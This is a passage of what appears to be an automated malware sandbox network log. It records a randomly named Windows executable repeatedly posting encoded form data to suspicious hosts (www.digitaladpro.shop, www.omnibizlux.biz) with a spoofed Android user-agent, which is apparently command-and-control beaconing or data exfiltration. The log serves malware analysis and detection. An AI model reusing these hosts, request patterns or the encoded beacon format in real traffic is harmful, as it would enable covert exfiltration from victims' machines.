                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 64 45 6f 32 42 73 39 6e 45 70 37 6d 6a 5a 42 2f 62 79 50 4c 42 55 4d 57 50 6d 51 54 50 43 72 30 31 64 53 58 4e 33 76 46 32 39 65 6d 79 54 56 71 6c 50 35 66 4c 73 7a 64 77 6a 39 35 2b 36 30 36 35 52 61 41 69 31 6f 7a 73 66 6e 48 2b 4c 33 63 6d 39 39 63 38 33 7a 50 30 35 6a 61 4d 4c 6b 65 69 4a 71 32 33 6d 35 4f 50 48 33 6f 5a 39 49 49 36 4e 53 6c 44 68 4e 71 61 2f 70 6d 37 42 33 4e 4d 4c 77 7a 74 46 50 38 55 30 76 49 4b 51 72 4c 4f 54 31 79 37 31 2b 71 42 32 56 57 39 67 32 46 43 43 6d 5a 6d 41 74 45 4c 44 71 4d 5a 51 77 4f 75 6b 45 75 35 72 58 58 59 69 36 76 51 59 38 55 5a 4d 36 70 4c 6b 3d
                                                                        Data Ascii: J8LHgDJp=GdEo2Bs9nEp7mjZB/byPLBUMWPmQTPCr01dSXN3vF29emyTVqlP5fLszdwj95+6065RaAi1ozsfnH+L3cm99c83zP05jaMLkeiJq23m5OPH3oZ9II6NSlDhNqa/pm7B3NMLwztFP8U0vIKQrLOT1y71+qB2VW9g2FCCmZmAtELDqMZQwOukEu5rXXYi6vQY8UZM6pLk=
                                                                        Nov 9, 2024 05:36:21.084949970 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Nov 9, 2024 05:36:21.085036039 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549991172.217.16.211803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:22.909890890 CET778OUTPOST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 64 45 6f 32 42 73 39 6e 45 70 37 6d 43 70 42 35 34 61 50 65 52 55 50 4b 66 6d 51 64 76 43 76 30 31 52 53 58 4d 7a 42 46 45 4a 65 6d 51 37 56 70 6b 50 35 63 4c 73 7a 57 51 6a 34 33 65 37 34 36 35 4e 38 41 6e 56 6f 7a 73 4c 6e 48 2b 37 33 62 56 46 79 4e 38 33 78 44 55 35 68 48 63 4c 6b 65 69 4a 71 32 32 47 44 4f 4d 33 33 6f 73 74 49 4a 62 4e 4e 37 54 68 53 37 61 2f 70 69 37 41 77 4e 4d 4c 33 7a 75 42 68 38 52 34 76 49 50 30 72 4c 61 48 79 6e 4c 31 38 6e 68 33 37 41 39 4a 5a 64 67 32 48 59 6c 31 45 62 70 62 66 41 50 68 61 55 4d 73 73 39 5a 48 76 48 4c 71 4e 2b 67 35 56 4f 36 63 4b 33 63 7a 72 7a 79 76 67 68 77 69 4c 38 50 46 47 47 77 54 74 71 75 61 51
                                                                        Data Ascii: J8LHgDJp=GdEo2Bs9nEp7mCpB54aPeRUPKfmQdvCv01RSXMzBFEJemQ7VpkP5cLszWQj43e7465N8AnVozsLnH+73bVFyN83xDU5hHcLkeiJq22GDOM33ostIJbNN7ThS7a/pi7AwNML3zuBh8R4vIP0rLaHynL18nh37A9JZdg2HYl1EbpbfAPhaUMss9ZHvHLqN+g5VO6cK3czrzyvghwiL8PFGGwTtquaQ
                                                                        Nov 9, 2024 05:36:23.659239054 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Nov 9, 2024 05:36:23.659260035 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549992172.217.16.211803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:25.597935915 CET1795OUTPOST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 64 45 6f 32 42 73 39 6e 45 70 37 6d 43 70 42 35 34 61 50 65 52 55 50 4b 66 6d 51 64 76 43 76 30 31 52 53 58 4d 7a 42 46 45 52 65 6e 6a 44 56 76 33 6e 35 64 4c 73 7a 56 51 6a 35 33 65 37 78 36 35 56 34 41 6e 5a 53 7a 75 7a 6e 47 64 7a 33 61 67 70 79 55 73 33 78 4c 30 35 6b 61 4d 4b 75 65 69 5a 75 32 33 71 44 4f 4d 33 33 6f 74 64 49 4f 4b 4e 4e 38 6a 68 4e 71 61 2f 74 6d 37 41 55 4e 50 37 42 7a 76 31 66 2f 6c 45 76 49 76 6b 72 45 4d 37 79 37 62 31 69 72 42 33 56 41 39 56 47 64 6b 57 31 59 6b 41 70 62 72 4c 66 46 5a 77 38 4a 63 38 6e 6e 37 4c 6a 4c 62 61 76 6d 56 4d 79 4a 49 41 53 79 75 61 4a 32 67 6e 4c 6a 47 53 48 76 74 46 4e 59 47 37 67 6a 5a 66 39 59 45 30 74 64 72 59 4e 49 6f 37 2b 4a 75 6c 31 69 56 4f 79 32 76 75 44 4e 52 35 33 76 2b 30 71 72 36 43 2f 54 71 76 58 56 41 4a 39 39 57 6c 42 6d 71 4f 50 33 50 34 68 6f 69 71 2b 57 70 42 74 52 54 69 52 70 66 6c 74 75 6b 4d 55 59 36 6f 69 77 50 2b 55 62 59 30 44 6d 71 76 68 34 77 34 65 75 57 37 43 74 6b 62 44 58 46 45 76 59 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=GdEo2Bs9nEp7mCpB54aPeRUPKfmQdvCv01RSXMzBFERenjDVv3n5dLszVQj53e7x65V4AnZSzuznGdz3agpyUs3xL05kaMKueiZu23qDOM33otdIOKNN8jhNqa/tm7AUNP7Bzv1f/lEvIvkrEM7y7b1irB3VA9VGdkW1YkApbrLfFZw8Jc8nn7LjLbavmVMyJIASyuaJ2gnLjGSHvtFNYG7gjZf9YE0tdrYNIo7+Jul1iVOy2vuDNR53v+0qr6C/TqvXVAJ99WlBmqOP3P4hoiq+WpBtRTiRpfltukMUY6oiwP+UbY0Dmqvh4w4euW7CtkbDXFEvYKFv1SWBnGVwH6RtaiGjD1i+ui7iMhDJwFXjHs5bG8qxAAD5PZ346yovyPeJQj16zEiTm9bgkUzlgFCGymrDAiEN6rwt0FAEuLCYz4q1EyDCprhhC0Gv6SbLwfMVKV5nfxoYmnpkFs4+nZ/2Z7xTnqfOX92ym2U5SMDvJidwpCEn6ZHiwTUeorn2RXAAj9DSWsCT09iE5Jn3xYLA5lLv27fvwNHf9tUX11mL37eSCxBjQYmFY+9nJSAY2YAGDKfjGgLqPmVEYN/aoUmhmhBP3lvgRJJTUxqFvtxEKWTaNkj+QFxO5ix+n6+jVGdaZ+/5zbqsBtq8ImwKnjJFr9bRjt4zPTBBwPJFKCEQM+2AjxXjledeelpUbKBE7cl5LFpJjL9rJJXk1w0gMdrpbAkWYLCrBbZGecY4juCS70fxaYS0RiUW0L50/Di+Oxv9sJade+OLV/6VDCqIVvJiDVX/KujUE2ORf/57tYvRhrRlRiLrAINrpdPkmKNmJhchqd+BBCfAHSntr5Kq3CbMU36v3bD+hu+2jpgjX+7YUn3f8TzrNq6S5P5hf95qthOOcrfuZODe9Gzdm0QfJK3YX66Y7PtaFOYlty9erWqSLhJUw/SH4x71Kv+bwSlcSRHjECmGibamFjTx7Hk+Hxt+RssxKG8DFbL9AcI404v [TRUNCATED]
                                                                        Nov 9, 2024 05:36:26.433048964 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Nov 9, 2024 05:36:26.433077097 CET537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549993172.217.16.211803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:28.147900105 CET493OUTGET /q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:28.989882946 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1730
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Nov 9, 2024 05:36:28.989898920 CET701INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549994167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:34.182660103 CET749OUTPOST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6a 61 48 59 6e 78 52 39 32 37 4b 4e 64 75 4c 65 54 76 4b 63 46 37 6f 4a 4a 61 73 53 4b 41 58 2f 38 77 71 33 32 63 62 71 50 78 57 78 76 4f 39 51 72 48 6b 51 75 73 69 32 39 77 6b 30 79 45 31 73 5a 43 52 59 34 4a 70 61 38 62 38 38 53 70 72 55 6a 41 53 6f 4c 33 6b 69 6a 74 45 49 34 31 7a 67 61 72 44 4a 62 48 57 62 6f 45 64 78 6a 57 7a 67 45 7a 64 34 46 61 46 74 69 4e 6c 59 34 6c 6f 42 76 39 36 2f 6d 38 4a 44 31 71 55 31 76 6a 4c 78 48 72 4d 5a 55 68 66 62 37 34 38 67 50 56 45 5a 59 75 43 7a 56 6e 72 63 51 51 7a 68 39 52 63 39 79 53 79 67 4a 45 31 52 2b 42 66 77 6d 31 6f 47 54 51 4c 58 44 4c 34 3d
                                                                        Data Ascii: J8LHgDJp=jaHYnxR927KNduLeTvKcF7oJJasSKAX/8wq32cbqPxWxvO9QrHkQusi29wk0yE1sZCRY4Jpa8b88SprUjASoL3kijtEI41zgarDJbHWboEdxjWzgEzd4FaFtiNlY4loBv96/m8JD1qU1vjLxHrMZUhfb748gPVEZYuCzVnrcQQzh9Rc9ySygJE1R+Bfwm1oGTQLXDL4=
                                                                        Nov 9, 2024 05:36:34.831196070 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:34 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549995167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:36.725117922 CET769OUTPOST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
